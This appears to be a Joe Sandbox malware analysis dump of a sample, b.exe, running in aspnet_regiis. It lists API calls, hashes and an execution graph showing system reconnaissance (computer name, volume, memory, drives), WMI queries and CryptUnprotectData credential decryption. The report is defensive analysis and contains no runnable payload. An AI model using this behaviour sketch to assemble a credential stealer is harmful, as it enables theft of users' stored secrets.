                                                                    • Instruction ID: 7a77f626423456e42f5d9a7d6a128cbf6a9dacd45c2ca4cc6a48a8b358d4332c
                                                                    • Opcode Fuzzy Hash: 73794ac943604b176beb4191737e3c2e9e4b7cdd8c13a38c3fb23333b024085e
                                                                    • Instruction Fuzzy Hash: 02218371604615EFDB109FE68C8095BB7ADFF0D3AC7048A19F96897E60E770EC408BA1
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,6CDE7F87,?,00000001,6CDE6394,?,6CDE8441,00000001,?,?,?,6CDE6323,?,00000000), ref: 6CDE3C7C
                                                                    • _free.LIBCMT ref: 6CDE3CD9
                                                                    • _free.LIBCMT ref: 6CDE3D0F
                                                                    • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CDE8441,00000001,?,?,?,6CDE6323,?,00000000,00000000,6CDF0360,0000002C,6CDE6394), ref: 6CDE3D1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: e7938321f74f9fd657c58b97e245e267e3fa0aa6fd707c7eb8ec0487f7ab753e
                                                                    • Instruction ID: 2b355444821fcca29aa89d1ae74bcdf91cc9a0f88094710d3df66abe2f56a024
                                                                    • Opcode Fuzzy Hash: e7938321f74f9fd657c58b97e245e267e3fa0aa6fd707c7eb8ec0487f7ab753e
                                                                    • Instruction Fuzzy Hash: 8F11CA35344645ABDA1157B64CC4E7B367AABCE77E7350224F22983AF1EB61D8144230
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00000001,6CDE4208,6CDE4299,?,?,6CDE34AC), ref: 6CDE3DD3
                                                                    • _free.LIBCMT ref: 6CDE3E30
                                                                    • _free.LIBCMT ref: 6CDE3E66
                                                                    • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CDE4208,6CDE4299,?,?,6CDE34AC), ref: 6CDE3E71
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 8669c1487ca4db7a841cd5fe137fdddf090ad3141b4beeb8d8ddd57b6c6a80db
                                                                    • Instruction ID: d8738551fbe3f1a745c62b73c30c703af793db4479db46df8a38a363c2347d1d
                                                                    • Opcode Fuzzy Hash: 8669c1487ca4db7a841cd5fe137fdddf090ad3141b4beeb8d8ddd57b6c6a80db
                                                                    • Instruction Fuzzy Hash: 1511C6323046117ADA1157B94CC09BB367AABCEBBA7650324F72993AF0EF61EC184134
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001), ref: 6CDE91ED
                                                                    • GetLastError.KERNEL32(?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001,?,00000001,?,6CDE8462,6CDE6323), ref: 6CDE91F9
                                                                      • Part of subcall function 6CDE91BF: CloseHandle.KERNEL32(FFFFFFFE,6CDE9209,?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001,?,00000001), ref: 6CDE91CF
                                                                    • ___initconout.LIBCMT ref: 6CDE9209
                                                                      • Part of subcall function 6CDE9181: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDE91B0,6CDE8C1D,00000001,?,6CDE7F16,?,?,00000001,?), ref: 6CDE9194
                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001,?), ref: 6CDE921E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: f18a52b914baa48bef598dc5200ac7145219f6ae589a3702509e37ff8f03d9c2
                                                                    • Instruction ID: edd2dc2be0917308eda63d63428bcb719aed24f5eba13b6024248456ce7268ef
                                                                    • Opcode Fuzzy Hash: f18a52b914baa48bef598dc5200ac7145219f6ae589a3702509e37ff8f03d9c2
                                                                    • Instruction Fuzzy Hash: 07F01C36601154BBDF522F92DC089CE3F76EB4E3B4F454111FB1985630C6329820DB98
                                                                    APIs
                                                                    • _free.LIBCMT ref: 6CDE35AD
                                                                      • Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
                                                                      • Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B
                                                                    • _free.LIBCMT ref: 6CDE35C0
                                                                    • _free.LIBCMT ref: 6CDE35D1
                                                                    • _free.LIBCMT ref: 6CDE35E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 2a6f57a65527565f33d95ff2a950645d9e8654fed7999cdd8b4add78a1606c2f
                                                                    • Instruction ID: c0bff5dca69d7a71ce482441efdcc25d34f7bbf8ea2d30a941e064037f6950b2
                                                                    • Opcode Fuzzy Hash: 2a6f57a65527565f33d95ff2a950645d9e8654fed7999cdd8b4add78a1606c2f
                                                                    • Instruction Fuzzy Hash: E4E0BF75A101A0DB8F117FA6D8444863E71A75E60D301C517E40412724C735997BEFB9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\b.exe
                                                                    • API String ID: 0-2794046411
                                                                    • Opcode ID: 4dab374582a9c95d9efb60c15971b02ee4e01c2a53d2da4a24a8f9a5f39b6811
                                                                    • Instruction ID: ae7588663cbe573ecaf6baaea59615a3aa0746610924e7e0d4e6bcd1d7ddf725
                                                                    • Opcode Fuzzy Hash: 4dab374582a9c95d9efb60c15971b02ee4e01c2a53d2da4a24a8f9a5f39b6811
                                                                    • Instruction Fuzzy Hash: 37418571A04259EBDB11DF9ACC84A9EBBF8EF9D31CF10406AE414A7B20D7709A45CB60

                                                                    Execution Graph

                                                                    Execution Coverage:10.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:26%
                                                                    Total number of Nodes:304
                                                                    Total number of Limit Nodes:30
                                                                    execution_graph 11669 246ef87 11670 246ef91 11669->11670 11670->11670 11671 246f0a5 GetPhysicallyInstalledSystemMemory 11670->11671 11672 246f0c9 11671->11672 11881 244d320 11882 244d340 11881->11882 11885 247aae0 11882->11885 11884 244d378 11884->11884 11887 247ab40 CoCreateInstance 11885->11887 11888 247afb5 11887->11888 11889 247abea SysAllocString 11887->11889 11890 247afc5 GetVolumeInformationW 11888->11890 11892 247ac77 11889->11892 11900 247afdc 11890->11900 11893 247afa1 SysFreeString 11892->11893 11894 247ac7f CoSetProxyBlanket 11892->11894 11893->11888 11895 247af97 11894->11895 11896 247ac9f SysAllocString 11894->11896 11895->11893 11898 247ad80 11896->11898 11898->11898 11899 247ad94 SysAllocString 11898->11899 11903 247adb7 11899->11903 11900->11884 11901 247af81 SysFreeString SysFreeString 11901->11895 11902 247af77 11902->11901 11903->11901 11903->11902 11904 247adfb VariantInit 11903->11904 11906 247ae60 11904->11906 11905 247af66 VariantClear 11905->11902 11906->11905 11907 24641a0 11908 24641ae 11907->11908 11912 24641f0 11907->11912 11913 24642b0 11908->11913 11914 24642c0 11913->11914 11914->11914 11915 2482530 LdrInitializeThunk 11914->11915 11916 246439f 11915->11916 11917 244d2e3 CoInitializeSecurity 11918 24725a0 CoSetProxyBlanket 11673 2483580 11674 248358f 11673->11674 11677 248366e 11674->11677 11681 247fac0 LdrInitializeThunk 11674->11681 11675 2483861 11677->11675 11679 24837ae 11677->11679 11682 247fac0 LdrInitializeThunk 11677->11682 11683 247d1b0 11679->11683 11681->11677 11682->11679 11684 247d256 11683->11684 11685 247d24a RtlFreeHeap 11683->11685 11686 247d1c4 11683->11686 11684->11675 11685->11684 11686->11685 11686->11686 11687 244da8d 11688 244da93 11687->11688 11689 244daa2 CoUninitialize 11688->11689 11690 244dae0 11689->11690 11919 244eaed 11921 244eb80 11919->11921 11920 244ec0e 11921->11920 11923 247fac0 LdrInitializeThunk 11921->11923 11923->11920 11924 246f3ed 11930 2481930 11924->11930 11927 246f450 GetComputerNameExA 11929 246f560 11927->11929 11929->11929 11931 246f3fd GetComputerNameExA 11930->11931 11931->11927 11691 247d196 RtlAllocateHeap 11692 244ad50 11695 244ad90 11692->11695 11693 244b094 11694 247d1b0 RtlFreeHeap 11694->11693 11695->11693 11695->11694 11695->11695 11932 2448c70 11933 2448c7f 11932->11933 11934 2448e47 ExitProcess 11933->11934 11935 2448c87 SHGetSpecialFolderPathW 11933->11935 11936 2448c9d 11935->11936 11937 2448ca5 GetCurrentThreadId 11936->11937 11938 2448e3d 11936->11938 11939 2448cc5 GetCurrentProcessId GetForegroundWindow 11937->11939 11938->11934 11941 2448da4 11939->11941 11945 244a020 11941->11945 11943 2448e31 11943->11938 11944 244d2b0 CoInitializeEx 11943->11944 11944->11938 11946 244a050 11945->11946 11946->11946 11947 244a0e7 LoadLibraryExW 11946->11947 11948 244a0fc 11947->11948 11949 244d6f0 11950 244d710 11949->11950 11950->11950 11951 244d795 11950->11951 11953 247fac0 LdrInitializeThunk 11950->11953 11953->11951 11696 24590d0 11698 24590f0 11696->11698 11698->11698 11712 2482370 11698->11712 11699 245929b 11701 24592fb 11699->11701 11703 245930c 11699->11703 11709 2459346 11699->11709 11711 24592a7 11699->11711 11730 24826f0 11699->11730 11700 24591be 11700->11699 11700->11701 11702 245928e 11700->11702 11700->11703 11700->11709 11700->11711 11716 247b0a0 11700->11716 11707 24826f0 LdrInitializeThunk 11701->11707 11702->11699 11702->11701 11702->11703 11705 2482370 LdrInitializeThunk 11702->11705 11702->11709 11702->11711 11703->11709 11703->11711 11734 24827d0 11703->11734 11705->11699 11707->11703 11709->11711 11740 247fac0 LdrInitializeThunk 11709->11740 11711->11711 11713 2482390 11712->11713 11714 24824de 11713->11714 11741 247fac0 LdrInitializeThunk 11713->11741 11714->11700 11717 2482370 LdrInitializeThunk 11716->11717 11727 247b0be 11717->11727 11718 247b18f 11724 247d1b0 RtlFreeHeap 11718->11724 11719 247b16e 11719->11718 11720 247d500 LdrInitializeThunk 11719->11720 11721 247b607 11719->11721 11744 247d650 11719->11744 11748 247d710 11719->11748 11720->11719 11726 247b195 11724->11726 11725 247b0cd 11725->11702 11726->11725 11742 247fac0 LdrInitializeThunk 11726->11742 11727->11718 11727->11719 11727->11725 11743 247fac0 LdrInitializeThunk 11727->11743 11731 2482720 11730->11731 11732 248277e 11731->11732 11760 247fac0 LdrInitializeThunk 11731->11760 11732->11701 11735 2482800 11734->11735 11738 248285e 11735->11738 11761 247fac0 LdrInitializeThunk 11735->11761 11736 248291e 11736->11709 11738->11736 11762 247fac0 LdrInitializeThunk 11738->11762 11740->11711 11741->11714 11742->11725 11743->11719 11745 247d6de 11744->11745 11746 247d65a 11744->11746 11745->11719 11746->11745 11756 247fac0 LdrInitializeThunk 11746->11756 11749 247d7b0 11748->11749 11751 247d72a 11748->11751 11749->11719 11750 247d7ae 11753 247d8ee 11750->11753 11758 247fac0 LdrInitializeThunk 11750->11758 11751->11749 11751->11750 11757 247fac0 LdrInitializeThunk 11751->11757 11753->11749 11759 247fac0 LdrInitializeThunk 11753->11759 11756->11745 11757->11750 11758->11753 11759->11749 11760->11732 11761->11738 11762->11736 11954 244d7f1 11955 244d800 11954->11955 11957 244d88e 11955->11957 12030 247fac0 LdrInitializeThunk 11955->12030 11959 244d95e 11957->11959 12031 247fac0 LdrInitializeThunk 11957->12031 11970 2466bd0 11959->11970 11961 244d9cf 11990 2466e00 11961->11990 11963 244d9ef 12012 2469060 11963->12012 11977 2466c70 11970->11977 11971 2482f40 2 API calls 11971->11977 11972 2466d67 12039 2462110 11972->12039 11973 2466b7d 11973->11961 11975 2466f80 12046 2482c40 11975->12046 11977->11971 11977->11972 11977->11973 11977->11975 11979 2482b00 LdrInitializeThunk 11981 2466fe4 11979->11981 11980 2482b00 LdrInitializeThunk 11980->11981 11981->11980 11981->11981 11983 2467bb0 11981->11983 11984 2468140 11981->11984 11985 2467d67 11981->11985 11983->11973 12064 247fac0 LdrInitializeThunk 11983->12064 11984->11984 11988 2468234 11984->11988 12062 247fac0 LdrInitializeThunk 11984->12062 11985->11984 11985->11985 12054 2483260 11985->12054 12063 247fac0 LdrInitializeThunk 11988->12063 11991 2466e10 11990->11991 11992 2482b00 LdrInitializeThunk 11991->11992 11997 2466d30 11992->11997 11993 2466d67 11998 2462110 2 API calls 11993->11998 11994 2466b7d 11994->11963 11995 2482f40 2 API calls 11995->11997 11996 2466f80 11999 2482c40 2 API calls 11996->11999 11997->11993 11997->11994 11997->11995 11997->11996 11998->11994 12000 2466fb0 11999->12000 12001 2482b00 LdrInitializeThunk 12000->12001 12003 2466fe4 12000->12003 12001->12003 12002 2482b00 LdrInitializeThunk 12002->12003 12003->12002 12003->12003 12005 2467bb0 12003->12005 12008 2468140 12003->12008 12009 2467d67 12003->12009 12004 2483260 2 API calls 12004->12009 12005->11994 12071 247fac0 LdrInitializeThunk 12005->12071 12010 2468234 12008->12010 12069 247fac0 LdrInitializeThunk 12008->12069 12009->12004 12009->12008 12070 247fac0 LdrInitializeThunk 12010->12070 12013 2469090 12012->12013 12015 24690ee 12013->12015 12072 247fac0 LdrInitializeThunk 12013->12072 12015->12015 12017 244da18 12015->12017 12019 24691ee 12015->12019 12073 247fac0 LdrInitializeThunk 12015->12073 12016 247d1b0 RtlFreeHeap 12016->12017 12020 2469520 12017->12020 12019->12016 12074 2469540 12020->12074 12030->11957 12031->11959 12043 2462120 12039->12043 12040 246222c 12040->11973 12041 24621f1 12042 2482530 LdrInitializeThunk 12041->12042 12042->12040 12043->12040 12043->12041 12044 2462267 12043->12044 12044->12040 12044->12044 12045 2464860 2 API calls 12044->12045 12045->12044 12047 2482c70 12046->12047 12048 2482cce 12047->12048 12065 247fac0 LdrInitializeThunk 12047->12065 12052 2466fb0 12048->12052 12053 2482df3 12048->12053 12066 247fac0 LdrInitializeThunk 12048->12066 12050 247d1b0 RtlFreeHeap 12050->12052 12052->11979 12052->11981 12053->12050 12053->12053 12055 2483290 12054->12055 12058 24832ee 12055->12058 12067 247fac0 LdrInitializeThunk 12055->12067 12056 2483568 12056->11985 12058->12056 12061 24833be 12058->12061 12068 247fac0 LdrInitializeThunk 12058->12068 12059 247d1b0 RtlFreeHeap 12059->12056 12061->12059 12061->12061 12062->11984 12063->11983 12064->11973 12065->12048 12066->12053 12067->12058 12068->12061 12069->12008 12070->12005 12071->11994 12072->12015 12073->12019 12075 24695b0 12074->12075 12075->12075 12076 247d260 2 API calls 12075->12076 12077 24695e4 12076->12077 12078 247fa30 12079 247fa4a 12078->12079 12080 247fa58 12078->12080 12079->12080 12081 247d1b0 RtlFreeHeap 12079->12081 12081->12080 11763 246e29c 11764 246e2b5 11763->11764 11767 247a760 11764->11767 11769 247a76e 11767->11769 11770 247a857 11769->11770 11776 247fac0 LdrInitializeThunk 11769->11776 11772 246fd4a 11770->11772 11773 247a95b 11770->11773 11775 247fac0 LdrInitializeThunk 11770->11775 11773->11772 11777 247fac0 LdrInitializeThunk 11773->11777 11775->11770 11776->11769 11777->11773 11783 2466618 11784 2466620 11783->11784 11792 2482530 11784->11792 11786 2466917 11786->11786 11787 2466a72 11786->11787 11796 2464860 11786->11796 11787->11787 11789 2466901 GetLogicalDrives 11791 2482530 LdrInitializeThunk 11789->11791 11790 2466791 11790->11786 11790->11787 11790->11789 11790->11790 11791->11786 11793 2482550 11792->11793 11794 248269e 11793->11794 11808 247fac0 LdrInitializeThunk 11793->11808 11794->11790 11797 2482370 LdrInitializeThunk 11796->11797 11801 24648a3 11797->11801 11798 24650cd 11798->11787 11799 2465045 11802 247d1b0 RtlFreeHeap 11799->11802 11801->11798 11806 246495e 11801->11806 11809 247fac0 LdrInitializeThunk 11801->11809 11803 2465055 11802->11803 11803->11798 11811 247fac0 LdrInitializeThunk 11803->11811 11806->11799 11807 247d1b0 RtlFreeHeap 11806->11807 11810 247fac0 LdrInitializeThunk 11806->11810 11807->11806 11808->11794 11809->11801 11810->11806 11811->11803 11812 245a4da 11813 245a4e0 11812->11813 11814 2482370 LdrInitializeThunk 11813->11814 11815 245a62d 11814->11815 11816 245a90a 11815->11816 11817 245a695 11815->11817 11818 24826f0 LdrInitializeThunk 11815->11818 11820 245a6d6 11815->11820 11823 245a7de 11815->11823 11824 245a7e0 11815->11824 11817->11816 11819 24827d0 LdrInitializeThunk 11817->11819 11817->11820 11817->11823 11818->11817 11819->11820 11820->11816 11820->11823 11848 247fac0 LdrInitializeThunk 11820->11848 11822 245aac3 CryptUnprotectData 11822->11824 11823->11816 11823->11822 11823->11824 11825 245b027 11824->11825 11829 245b0fd 11824->11829 11849 245ebf0 11824->11849 11825->11829 11831 247b350 11825->11831 11830 245b3e1 11830->11829 11840 247d260 11830->11840 11852 2482b00 11831->11852 11835 247b396 11838 247b3d3 11835->11838 11864 2483580 11835->11864 11836 247b45e 11836->11830 11838->11836 11872 247fac0 LdrInitializeThunk 11838->11872 11841 247d290 11840->11841 11844 247d2ee 11841->11844 11878 247fac0 LdrInitializeThunk 11841->11878 11842 247d4d1 11842->11830 11844->11842 11847 247d3de 11844->11847 11879 247fac0 LdrInitializeThunk 11844->11879 11845 247d1b0 RtlFreeHeap 11845->11842 11847->11845 11848->11823 11851 245ec15 11849->11851 11850 24590d0 RtlFreeHeap LdrInitializeThunk 11850->11851 11851->11850 11853 2482b20 11852->11853 11853->11853 11854 247b36c 11853->11854 11873 247fac0 LdrInitializeThunk 11853->11873 11854->11836 11856 2482f40 11854->11856 11857 2482f70 11856->11857 11861 2482fce 11857->11861 11874 247fac0 LdrInitializeThunk 11857->11874 11858 2483244 11858->11835 11860 247d1b0 RtlFreeHeap 11860->11858 11861->11858 11863 248309e 11861->11863 11875 247fac0 LdrInitializeThunk 11861->11875 11863->11860 11865 248358f 11864->11865 11868 248366e 11865->11868 11876 247fac0 LdrInitializeThunk 11865->11876 11866 2483861 11866->11838 11868->11866 11870 24837ae 11868->11870 11877 247fac0 LdrInitializeThunk 11868->11877 11869 247d1b0 RtlFreeHeap 11869->11866 11870->11869 11872->11836 11873->11854 11874->11861 11875->11863 11876->11868 11877->11870 11878->11844 11879->11847

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 247aae0-247ab3f 1 247ab40-247ab73 0->1 1->1 2 247ab75-247ab8c 1->2 4 247ab96-247abe4 CoCreateInstance 2->4 5 247ab8e 2->5 6 247afb5-247afda call 2481930 GetVolumeInformationW 4->6 7 247abea-247ac1f 4->7 5->4 12 247afe3-247afe5 6->12 13 247afdc-247afdf 6->13 9 247ac20-247ac45 7->9 9->9 11 247ac47-247ac79 SysAllocString 9->11 18 247afa1-247afb1 SysFreeString 11->18 19 247ac7f-247ac99 CoSetProxyBlanket 11->19 14 247affd-247b004 12->14 13->12 16 247b006-247b00d 14->16 17 247b010-247b053 call 2461050 14->17 16->17 25 247b060-247b068 17->25 18->6 21 247af97-247af9d 19->21 22 247ac9f-247acbf 19->22 21->18 24 247acc0-247ad06 22->24 24->24 26 247ad08-247ad7f SysAllocString 24->26 25->25 28 247b06a-247b078 25->28 27 247ad80-247ad92 26->27 27->27 29 247ad94-247adb9 SysAllocString 27->29 30 247aff0-247aff7 28->30 31 247b07e-247b08e call 2448600 28->31 36 247af81-247af93 SysFreeString * 2 29->36 37 247adbf-247ade1 29->37 30->14 32 247b093-247b09a 30->32 31->30 36->21 39 247af77-247af7d 37->39 40 247ade7-247adea 37->40 39->36 40->39 41 247adf0-247adf5 40->41 41->39 42 247adfb-247ae54 VariantInit 41->42 43 247ae60-247ae91 42->43 43->43 44 247ae93-247aea1 43->44 45 247aea5-247aea7 44->45 46 247af66-247af73 VariantClear 45->46 47 247aead-247aeb3 45->47 46->39 47->46 48 247aeb9-247aec7 47->48 49 247aefd 48->49 50 247aec9-247aece 48->50 52 247aeff-247af27 call 24483e0 call 24702d0 49->52 51 247aedc-247aee0 50->51 53 247aee2-247aeeb 51->53 54 247aed0 51->54 63 247af2e-247af3a 52->63 64 247af29 52->64 57 247aef2-247aef6 53->57 58 247aeed-247aef0 53->58 56 247aed1-247aeda 54->56 56->51 56->52 57->56 60 247aef8-247aefb 57->60 58->56 60->56 65 247af41-247af64 call 2448410 call 24483f0 63->65 66 247af3c 63->66 64->63 65->46 66->65
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(02485678,00000000,00000001,02485668,00000000), ref: 0247ABDC
                                                                    • SysAllocString.OLEAUT32 ref: 0247AC48
                                                                    • CoSetProxyBlanket.COMBASE(899A8F55,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0247AC91
                                                                    • SysAllocString.OLEAUT32 ref: 0247AD0B
                                                                    • SysAllocString.OLEAUT32 ref: 0247AD95
                                                                    • VariantInit.OLEAUT32(?), ref: 0247AE00
                                                                    • VariantClear.OLEAUT32(?), ref: 0247AF67
                                                                    • SysFreeString.OLEAUT32(?), ref: 0247AF8B
                                                                    • SysFreeString.OLEAUT32(?), ref: 0247AF91
                                                                    • SysFreeString.OLEAUT32(?), ref: 0247AFA5
                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0247AFD6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                    • String ID: 2zS$C$HI$Q:$R[$\$dW$e]
                                                                    • API String ID: 2573436264-720759029
                                                                    • Opcode ID: 69573046693562a46a6d145102ebe27b61b7888f98bf1b5746cec039508f7334
                                                                    • Instruction ID: f348c824c4ed3a9bf8ddf4d11ec973389452ba38b528a1f79563d53c588c9933
                                                                    • Opcode Fuzzy Hash: 69573046693562a46a6d145102ebe27b61b7888f98bf1b5746cec039508f7334
                                                                    • Instruction Fuzzy Hash: B3E1EAB1A48350AFE310DF24CC85B9FBBE5EB85714F04892DFAA59B280D775D805CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $).)($2$<=$qt$xO
                                                                    • API String ID: 0-2945988728
                                                                    • Opcode ID: f8fabf440a7b9042b693a7f35c1ae3d3161fe01e4cf3c929672d282a96b7bd7b
                                                                    • Instruction ID: 3fccef818d6e273b724e18695d354586c106a0c3e0f76f192f891aeacf2548ef
                                                                    • Opcode Fuzzy Hash: f8fabf440a7b9042b693a7f35c1ae3d3161fe01e4cf3c929672d282a96b7bd7b
                                                                    • Instruction Fuzzy Hash: CA92FFB19093918BD734DF28D8957AFB7E1EF85314F044A2DD8C98B392EB349951CB82

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 462 2466618-246661e 463 2466627 462->463 464 2466620-2466625 462->464 465 246662a-246664a call 24483e0 463->465 464->465 469 2466651 465->469 470 2466659-2466662 465->470 469->470 471 2466664-2466669 470->471 472 246666b 470->472 473 2466672-24666bb call 24483e0 471->473 472->473 476 24666c0-2466722 473->476 476->476 477 2466724-246672f 476->477 478 2466751-246675e 477->478 479 2466731-2466739 477->479 481 2466760-2466764 478->481 482 2466781-246678c call 2482530 478->482 480 2466740-246674f 479->480 480->478 480->480 483 2466770-246677f 481->483 485 2466791-2466799 482->485 483->482 483->483 486 24667b6-24667bf 485->486 487 24667a6-24667ad 485->487 488 24667a0 485->488 489 2466940-2466946 call 24483f0 485->489 490 246694f-2466a07 485->490 491 2466a7d-2466a95 485->491 492 2466b7d 485->492 493 246693a 485->493 494 2466928-2466932 485->494 495 24667c1-24667c6 486->495 496 24667c8 486->496 487->486 488->487 489->490 498 2466a10-2466a5b 490->498 499 2466aa0-2466ab2 491->499 502 2466b83 492->502 493->489 494->493 500 24667cf-2466878 call 24483e0 495->500 496->500 498->498 503 2466a5d-2466a75 call 2464860 498->503 499->499 504 2466ab4-2466b3f 499->504 513 2466880-24668a6 500->513 510 2466b89-2466b92 call 24483f0 502->510 503->491 505 2466b40-2466b54 504->505 505->505 508 2466b56-2466b75 call 24643f0 505->508 508->492 520 2466ba0-2466ba6 call 24483f0 510->520 513->513 516 24668a8-24668b3 513->516 518 24668b5-24668bf 516->518 519 24668d1-24668de 516->519 521 24668c0-24668cf 518->521 522 24668e0-24668e4 519->522 523 2466901-2466921 GetLogicalDrives call 2482530 519->523 529 2466baf 520->529 521->519 521->521 525 24668f0-24668ff 522->525 523->489 523->491 523->492 523->493 523->494 523->502 523->510 523->520 